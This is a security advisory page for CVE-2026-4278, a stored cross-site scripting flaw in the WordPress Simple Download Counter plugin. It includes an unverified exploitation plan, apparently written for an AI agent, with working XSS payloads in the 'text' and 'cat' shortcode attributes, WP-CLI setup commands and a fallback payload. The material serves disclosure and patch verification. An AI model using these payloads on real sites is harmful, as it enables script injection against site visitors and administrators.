WP-Safety
CVE-2026-4278

Simple Download Counter <= 2.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'text' Shortcode Attribute

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
2.3.1
Patched in
1d
Time to patch

Description

The Simple Download Counter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'sdc_menu' shortcode in all versions up to, and including, 2.3. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes, specifically the 'text' and 'cat' attributes. The 'text' attribute is output directly into HTML content on line 159 without any escaping (e.g., esc_html()). The 'cat' attribute is used unescaped in HTML class attributes on lines 135 and 157 without esc_attr(). This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.3
PublishedMarch 25, 2026
Last updatedMarch 26, 2026
Affected pluginsimple-download-counter

What Changed in the Fix

Changes introduced in v2.3.1

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v2.3
Browse source Download .zip
Patched v2.3.1
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-4278 - Simple Download Counter Stored XSS ## 1. Vulnerability Summary The **Simple Download Counter** plugin (up to version 2.3) contains a stored cross-site scripting (XSS) vulnerability. The plugin registers a shortcode `[sdc_menu]` which processes user-supp…

Show full research plan

Exploitation Research Plan: CVE-2026-4278 - Simple Download Counter Stored XSS

1. Vulnerability Summary

The Simple Download Counter plugin (up to version 2.3) contains a stored cross-site scripting (XSS) vulnerability. The plugin registers a shortcode [sdc_menu] which processes user-supplied attributes. Specifically, the text and cat attributes are concatenated directly into the HTML output without being sanitized or escaped using WordPress security functions like esc_html() or esc_attr(). This allows an authenticated user with at least Contributor permissions (who can create posts and use shortcodes) to inject malicious scripts that execute in the context of any user viewing the affected page.

2. Attack Vector Analysis

  • Shortcode: [sdc_menu]
  • Vulnerable Attributes: text, cat
  • Authentication Level: Authenticated (Contributor+)
  • Endpoint: Post/Page editor (to save the shortcode) and the Frontend (where the shortcode is rendered).
  • Preconditions: The attacker must be able to save a post or page containing the shortcode. In standard WordPress configurations, Contributors can save drafts. The XSS will trigger when an Admin reviews the draft or if the post is published and viewed.

3. Code Flow

  1. Entry Point: The shortcode is registered in simple-download-counter.php via:
    add_shortcode('sdc_menu', 'simple_download_counter_menu');
  2. Attribute Extraction: Inside inc/functions-shortcode.php, the function simple_download_counter_menu($atts) is called. It uses shortcode_atts to define defaults and extract user input:
    extract(shortcode_atts(array(
    'cat'    => '',
    'number' => 3,
    'extra'  => 'false',
    'text'   => 'Download more...',
), $atts, 'sdc_menu'));
  3. Vulnerable Sinks (Cat Attribute):
    • Line 135: $output = '<ul class="sdc-menu-list sdc-menu-list-'. $cat .'">';
    • Line 157: $output .= '<select class="sdc-menu-select sdc-menu-select-'. $cat .'" onchange="...">';
  4. Vulnerable Sink (Text Attribute):
    • Line 159: $output .= '<option disabled selected>'. $text .'</option>';
  5. Return: The unsanitized $output is returned to the WordPress content filter and rendered in the browser.

4. Nonce Acquisition Strategy

Shortcodes are executed server-side during the rendering of post content. There is no nonce requirement for a shortcode to execute on the frontend. The "Stored" part of the attack occurs during the standard post-saving process. For a Contributor to save a draft, they use the standard WordPress post.php or REST API endpoints, which are handled by the WordPress core's native CSRF protection. However, since the goal is to demonstrate the XSS rendering, we can bypass the manual UI and use WP-CLI to inject the payload directly into a post.

5. Exploitation Strategy

The goal is to demonstrate that an injected script executes when the post is viewed.

Step-by-Step Plan:

  1. Inject via text attribute: This is the most straightforward payload as it sits inside an <option> tag.
  2. Inject via cat attribute: This allows breaking out of an HTML attribute (class).

Payloads:

  • text Payload: [sdc_menu cat="test" extra="true" text='</option><script>alert("XSS_TEXT_ATTR")</script>']
  • cat Payload: [sdc_menu cat='"><script>alert("XSS_CAT_ATTR")</script>' extra="true"]

Execution (HTTP Request via Agent):

The agent should navigate to the created post using browser_navigate. If the script executes, the XSS is confirmed.

6. Test Data Setup

Use WP-CLI to set up the environment efficiently:

  1. Create Contributor User:
    wp user create attacker attacker@example.com --role=contributor --user_pass=password123
  2. Create a Download Category (required by line 118 check):
    wp term create sdc_download_category "Exploit Category" --slug=exploit-cat
  3. Create a Post with the Malicious Shortcode:
    wp post create --post_type=post --post_status=publish --post_title="XSS Test" --post_content='[sdc_menu cat="exploit-cat" extra="true" text="</option><script>console.log(\"CVE-2026-4278-SUCCESS\")</script>"]'

7. Expected Results

  1. When the post is rendered, the HTML source at the location of the shortcode should look like:
    <select class="sdc-menu-select sdc-menu-select-exploit-cat" ...>
<option disabled selected></option><script>console.log("CVE-2026-4278-SUCCESS")</script></option>
...
</select>
  2. The browser console should display CVE-2026-4278-SUCCESS.

8. Verification Steps

  1. Verify Content Storage:
    wp post get [POST_ID] --field=post_content
  2. Verify Rendered Output (CLI):
    Use curl or http_request to fetch the frontend URL of the post and grep for the raw payload:
    curl -s http://localhost:8080/?p=[POST_ID] | grep "CVE-2026-4278-SUCCESS"
  3. Verify Execution:
    Use browser_navigate to the post URL and check for the console log or an alert box.

9. Alternative Approaches

If the cat check at line 118 (if (empty($cat))) is strict or the taxonomy query fails in a way that prevents reaching line 159, ensure that:

  1. A post of type sdc_download exists and is assigned to the category slug provided in the cat attribute.
  2. Fallback Payload (Cat Attribute): Use [sdc_menu cat='sdc-list"><script>alert(1)</script>' number="3"]. This targets line 135:
    <ul class="sdc-menu-list sdc-menu-list-sdc-list"><script>alert(1)</script>">
    This bypasses the need for the extra="true" attribute and targets a different sink.
References
https://www.wordfence.com/threat-intel/vulnerabilities/id/f23dec73-9031-4829-a84b-4979c8e8ded4?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database